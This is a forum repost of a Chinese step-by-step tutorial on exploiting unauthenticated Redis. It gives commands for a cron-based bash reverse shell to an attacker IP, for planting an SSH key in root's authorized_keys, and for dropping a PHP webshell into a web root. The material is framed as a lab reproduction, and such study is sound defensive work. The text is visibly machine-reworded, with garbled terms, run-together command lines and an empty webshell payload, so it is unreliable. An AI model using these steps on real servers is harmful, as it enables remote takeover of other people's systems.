请选择 进入手机版 | 继续访问电脑版

redis未授权复现

[复制链接]
奋斗在韩 发表于 2021-1-1 10:30:56 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
redis未授权复现

  redis设置文件如有不妥可造成未授权访问,攻击者可使用定时任务,写入私钥,向web路径写入shell来获取权限。
情况搭建

centos安装redis:
  1. wget http://download.redis.io/releases/redis-3.2.0.tar.gztar xzf redis-3.2.0.tar.gzcd redis-3.2.0make
复制代码
修改redis.conf设置文件:
  将这一条bind 127.0.0.1注释
将protected-mode设为no
启动redis即可
底子用法


  • 毗连redis:
  1. redis-cli -h IP -p port(默认6379)
复制代码
  1. info
复制代码

攻击方法

定时任务反弹shell

  限定条件:root权限运行redis

  • 本机监听端口:
  1. nc -lvvp 7999
复制代码

  • 毗连redis运行下令:
  1. root@kali:~# redis-cli -h 192.168.37.135192.168.37.135:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.37.132/7999 0>&1\n"192.168.37.135:6379> config set dir /var/spool/cron/192.168.37.135:6379> config set dbfilename root192.168.37.135:6379> save
复制代码

  • 监听端口处即可获得反弹的shell

写入公钥getshell

  限定条件:
  

  • root权限运行redis
  • 目标开启SSH服务且允许密钥登岸

  • 当地生成密钥:
  1. ssh-keygen -t rsa
复制代码
  1. 公钥会生成在/root/..sh/目次下的id_rsa.pub
复制代码

  • redis执行以下下令:
  1. 192.168.37.135:6379> config set dir /root/.ssh/192.168.37.135:6379> config set dbfilename authorized_keys192.168.37.135:6379> set x "\n\n\n生成公钥\n\n\n"192.168.37.135:6379> save
复制代码

  • 在本机毗连ssh即可
  1. ssh -i id_rsa root@ip#在生成的共私钥目次下运行
复制代码

在web路径写shell

  限定条件:
  

  • 任何权限都可以,前提是对web路径有写入权限
  • 知道绝对路径

  • 执行以下下令:
  1. 192.168.37.135:6379> config set dir /www/localhost_80/wwwroot/# 网站绝对路径192.168.37.135:6379> config set dbfilename shell.php192.168.37.135:6379> set x ""192.168.37.135:6379> save
复制代码

  • 访问即可


来源:https://blog.csdn.net/nuanliunian/article/details/111992638
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


专注素材教程免费分享
全国免费热线电话

18768367769

周一至周日9:00-23:00

反馈建议

27428564@qq.com 在线QQ咨询

扫描二维码关注我们

Powered by Discuz! X3.4© 2001-2013 Comsenz Inc.( 蜀ICP备2021001884号-1 )